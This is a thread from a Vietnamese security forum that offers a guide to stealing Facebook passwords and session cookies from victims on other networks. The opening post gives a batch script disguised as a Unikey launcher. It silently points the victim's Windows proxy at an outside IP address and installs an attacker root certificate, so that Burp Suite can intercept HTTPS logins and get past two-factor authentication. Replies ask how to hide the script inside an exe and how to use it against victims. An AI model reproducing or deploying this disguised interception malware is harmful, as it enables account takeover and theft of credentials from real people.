Hướng dẫn lấy pass facebook ngoài mạng lan với phương pháp sniff

Thảo luận trong 'Audit/Pentest Security' bắt đầu bởi Nhựt Trường, 08/05/18, 10:05 AM.

  1. Nhựt Trường

    Nhựt Trường Whi-----

    Tham gia: 31/10/13, 02:10 AM
    Bài viết: 137
    Đã được thích: 31
    Điểm thành tích:
    48
    [​IMG]
    lấy pass facebook ngoài mạng lan với phương pháp sniff đặt biệt https vẫn xanh có thể lấy luôn cookie vượt xác thực 2 bước.

    Nói chung với cách này thì gần như có thể tấn công mọi dịch vụ rùi. có thằng gmail thì chưa test kỷ thấy mã hóa lớp nửa chứ không hiện pass rỏ như facebook nhưng gmail vẫn đẻ lộ cookie ra.
    Công cụ:
    - Burp Suite
    - Cookie Injector: https://greasyfork.org/vi/scripts/5864-cookie-injector
    - icon unikey
    - unikey
    - code run.bat
    @echo off
    cd C:\Program Files\Unikey
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" ^ /v ProxyEnable /t REG_DWORD /d 1 /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" ^ /v ProxyServer /t REG_SZ /d 14.230.230.195:8080 /f
    certutil -addstore root windows.cer
    del windows.cer

    start UniKeyNT.exe


    Video hướng dẫn:


    link download các file bài hướng dẫn:
    https://drive.google.com/file/d/1rhccJO3jwnV5nM1MifngI1VOZjQ6sbHM/view?usp=sharing
     
    Chỉnh sửa cuối: 08/05/18, 03:05 PM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    hungp and du0n9 like this.
  2. kibi1997

    kibi1997 Member

    Tham gia: 07/05/17, 07:05 PM
    Bài viết: 15
    Đã được thích: 2
    Điểm thành tích:
    3
    cho mình hỏi hướng dẫn để nhúng bat vào file exe đi ạ.
    Xin cảm ơn.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. du0n9

    du0n9 Member

    Tham gia: 28/01/18, 12:01 PM
    Bài viết: 22
    Đã được thích: 8
    Điểm thành tích:
    3
    Cho mình hỏi sau khi đã cài certificate của burpsuite rồi thì làm thế nào để sử dụng lại chứng chỉ của google hay facebook...
    Vì giả sử ta muốn victim không kết nối qua proxy nữa mà không có chứng chỉ thì không vào https được.
    Edit: Mình test lại thì thấy nếu dùng chrome thì nó sẽ tự dùng lại certificate cũ. Còn firefox thì chẳng hiểu sao cứ báo lỗi.
    Screenshot from 2018-05-12 13-15-38.png
     
    Chỉnh sửa cuối: 12/05/18, 12:05 PM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. Van

    Van Member

    Tham gia: 22/12/17, 10:12 AM
    Bài viết: 20
    Đã được thích: 0
    Điểm thành tích:
    1
    Cho mình hỏi cái này áp dụng cho 2 máy khác nhau của 2 mạng khác nhau hay của của cùng 1 mạng ạ.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. du0n9

    du0n9 Member

    Tham gia: 28/01/18, 12:01 PM
    Bài viết: 22
    Đã được thích: 8
    Điểm thành tích:
    3
    Cái này có thể áp dụng cho 2 máy ở 2 mạng khác nhau nhưng bạn phải mở port trên máy có burpsuite để victim kết nối qua proxy của burpsuite.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. Van

    Van Member

    Tham gia: 22/12/17, 10:12 AM
    Bài viết: 20
    Đã được thích: 0
    Điểm thành tích:
    1
    Mình cám ơn. Có thể giải thích rõ hơn cho mình được không. Mình chưa hiểu lắm. Tức là phải bật burpsuite trên máy nạn nhân à.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan